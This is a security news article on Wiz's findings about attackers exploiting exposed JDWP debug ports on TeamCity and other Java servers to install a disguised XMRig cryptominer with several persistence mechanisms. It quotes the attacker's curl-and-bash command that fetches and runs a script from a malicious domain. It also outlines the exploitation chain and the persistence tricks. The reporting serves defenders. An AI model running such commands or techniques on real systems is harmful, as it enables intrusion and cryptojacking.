Exposed JDWP Debug Ports Under Attack: Cryptominers Infiltrating Java Apps in Hours
Experts at Wiz have identified a new wave of attacks targeting TeamCity servers—a widely used platform for orchestrating CI/CD workflows. Threat actors exploited a misconfigured Java Debug Wire Protocol (JDWP) interface, enabling remote command execution. Following the breach, they deployed a cryptocurrency miner and embedded multiple persistence mechanisms into the compromised systems.
What sets this campaign apart is its astonishing speed—only a few hours elapsed between the discovery of a vulnerable server and the deployment of malicious payloads. Similar patterns observed in other cases point to a high degree of automation behind these attacks.
Upon analysis, the attackers were found to be using a modified version of XMRig, a popular tool among cybercriminals for cryptocurrency mining. The miner’s configuration was hardcoded into the binary itself, obfuscating typical command-line arguments that are often flagged by security systems. To further complicate attribution, mining proxy servers were used to conceal the wallet addresses, thereby hindering investigative efforts.
JDWP, a standard protocol within the Java ecosystem, facilitates real-time debugging of applications, allowing developers to inspect code execution, thread states, and memory without restarting the program. However, JDWP lacks built-in authentication and access control mechanisms. When exposed—either inadvertently or deliberately—to the public internet, it presents a severe security risk, effectively granting attackers full control over Java processes.
Although JDWP is disabled by default in most applications, it is automatically enabled in debugging mode. Commonly affected systems include TeamCity, Jenkins, Selenium Grid, Elasticsearch, Quarkus, Spring Boot, and Apache Tomcat.
Wiz’s threat intelligence team observed consistent interest in JDWP from malicious actors. Over a 90-day period, using GreyNoise telemetry, they identified more than 6,000 unique IP addresses actively scanning the internet for open JDWP endpoints.
One such scan resulted in a honeypot incident involving Wiz’s own server, where port 5005 was intentionally left open for JDWP. The attacker issued a JDWP handshake request to verify the service’s availability and retrieve metadata on the JVM and loaded classes. A classic exploitation chain then ensued to gain remote access.
The attacker appeared to employ a tool akin to jdwp-shellifier, albeit with expanded capabilities. They enumerated available classes and methods, located java.lang.Runtime, invoked getRuntime() and exec() methods, and executed system-level commands to fetch and run a malicious script:
curl -o /tmp/logservice.sh -s https://canonicalconnect[.]com/logservice.sh
bash /tmp/logservice.sh
This script retrieved and launched the primary malware component—logservice.sh—which immediately began purging other miners, terminating high-CPU processes (excluding whitelisted ones), and deploying a customized XMRig binary under the guise of a legitimate logrotate process. It then entrenched itself within the system.
To ensure persistence, the malware employed a broad arsenal of techniques. It modified shell configuration files (bash, zsh), edited startup scripts like rc.local, created a counterfeit systemd service mimicking logrotate, and established multiple cron jobs for routine re-execution. The attacker even escalated privileges to alter critical system files and applied the chattr +i attribute to make them immutable.
A notable feature of this malware was its masquerade as a legitimate logrotate process. The binary was a customized variant of XMRig with all configurations and commands internally embedded, significantly complicating detection.
Experts emphasize that exposing JDWP to the public internet constitutes a critical misconfiguration that directly enables remote code execution. Such vulnerabilities are particularly perilous within CI/CD infrastructures, where a compromised server could lead not only to covert cryptojacking but also to sophisticated, wide-scale attacks targeting the entire development pipeline.
